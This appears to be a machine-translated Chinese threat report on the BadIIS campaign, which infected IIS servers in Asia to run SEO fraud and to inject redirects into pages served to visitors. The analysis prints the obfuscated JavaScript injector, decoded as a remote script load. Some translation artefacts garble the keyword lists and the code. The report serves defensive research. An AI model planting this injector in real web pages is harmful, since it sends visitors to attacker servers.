2024 年,一种名为“BadIIS”的恶意软件在亚洲大量传播。BadIIS 以 Internet 信息服务 (IIS) 为目标,可用于 SEO 欺诈或向合法用户的浏览器中注入恶意内容。这包括显示未经授权的广告、分发恶意软件,甚至针对特定群体进行水坑攻击。在此活动中,威胁行为者利用易受攻击的 IIS 服务器在受感染的服务器上安装 BadIIS 恶意软件。一旦用户向受感染的服务器发送请求,他们可能会收到来自攻击者的更改内容。这可能导致两种潜在结果:
- 连接到非法赌博网站:修改后的内容将用户重定向到涉及非法赌博活动的网站。
- 连接到恶意服务器:用户被重定向到由攻击者控制的服务器,这些服务器托管恶意软件或网络钓鱼计划等恶意内容。
根据文件普查和网络流量,我们确定了受影响的地区,包括印度、泰国、越南、菲律宾、新加坡、台湾、韩国、日本和巴西。我们还观察到孟加拉国是一个潜在目标。目标 IIS 服务器包括政府、大学、科技公司和电信部门拥有的机器。我们注意到,受影响的地区不仅限于受感染机器的位置。在大多数情况下,受害者位于同一地区;但是,我们发现有些人在访问不同地区的受感染服务器时受到了影响。
通过从样本中发现的信息(例如提取的域名、用简体中文书写的字符串),我们认为这些变体很可能是由中文团体制作和部署的。
图 1. 受害者学
图 2. 目标 IIS 服务器的地理分布
错误的IIS安装
其中一名攻击者在成功利用 IIS 服务器后,使用包含以下命令的批处理文件来安装 BadIIS 模块。以下是用于安装 BadIIS 的脚本:
图 3. 用于 IIS 模块安装的脚本之一
SEO 操纵方案中使用的关键特征和关键词
在分析了此次活动中使用的变体后,我们发现它们在功能和 URL 模式上与 Group11 之前使用的变体有相似之处,正如Black Hat USA 2021 演讲白皮书中提到的那样。然而,新变体具有一个名为“OnSendResponse”而不是“OnBeginRequest”的处理程序。
SEO欺诈模式
安装的 BadIIS 可以更改从 Web 服务器请求的 HTTP 响应标头信息。它会检查收到的 HTTP 标头中的**“User-Agent”和“Referer”**字段。如果这些字段包含特定的搜索门户网站或关键字,BadIIS 会将用户重定向到与在线非法赌博网站相关的页面,而不是合法网页。此功能旨在识别可能用于 SEO 欺诈的搜索引擎抓取工具的流量。
| User-Agent 字段中的关键字检查 | Referer 字段的关键字检查 |
| - 360<br>- 百度<br>- 兵<br>- 科科克<br>- 道姆<br>- 谷歌<br>- 纳韦尔<br>- 搜狗<br>- 一搜 | - 百度<br>- bing.com<br>- 科科克<br>- 达姆网络<br>- 谷歌<br>- naver.com<br>- 搜<br>- 搜狗<br>- 森美兰网 |
图4 SEO作弊模式工作流程
喷射器模式
在此模式下,已安装的 BadIIS 会将可疑的 JavaScript 代码注入合法访问者请求的典型响应中。这样,访问者将被重定向到恶意网站。
图 5. 注入器模式的工作流程
注入时使用以下混淆代码:
<script type = "text/javascript"> eval(function(p, a, c, k, e, r) {
e = function(c) {
return (c < a ? '' : e(parseInt(c / a))) + ((c = c % a) > 35 ? String.fromCharCode(c + 29) : c.toString(36))
};
if (!''.replace(/^/, String)) {
while (c--) r[e(c)] = k[c] || e(c);
k = [function(e) {
return r[e]
}];
e = function() {
return '\w+'
};
c = 1
};
while (c--)
if (k[c]) p = p.replace(new RegExp('\b' + e(c) + '\b', 'g'), k[c]);
返回 p
}('m(d(p,a,c,k,e,r){e=d(c){f cn(a)};h(!''.i(/^/,o)){j(c--)r[e(c)]=k[c]||e(c);k=[d(e){fr[e]}];e=d(){f'\\w+'};c=1};j(c--)h(k[c])p=pi(qs('\\b'+e(c)+'\\b','g'),k[c]);fp}('1["2"]["3"](\'<0 4="5/6" 7="8://9.a/bc"></0>\');',l,l,'t|u|v|x|y|z|A|B|C|D|E|F|G'.H('|'),0,{}))',44,44,'||||||||||||||||function||return||if|replace|while||13|eval|toString|String||new||RegExp|script|window|document||write|type|text|javascript|src| {js} |split'.split('|'),0,{}))</script>
C&C URL 使用单个 XOR 密钥“0x03”进行加密,并在运行时解密。解码后的代码如下所示:
document.write(<script type="text/javascript" src= {恶意URL} ></script>)
结论和 IIS 安全的重要性
IIS 是许多组织广泛采用的服务之一,滥用它会导致严重后果。攻击者可以利用 IIS 漏洞向受感染网站的合法访问者提供恶意内容。在最近的活动中,新变种主要用于提供与在线赌博相关的内容。这种方法很容易适应大规模恶意软件分发和针对特定群体的水坑攻击。
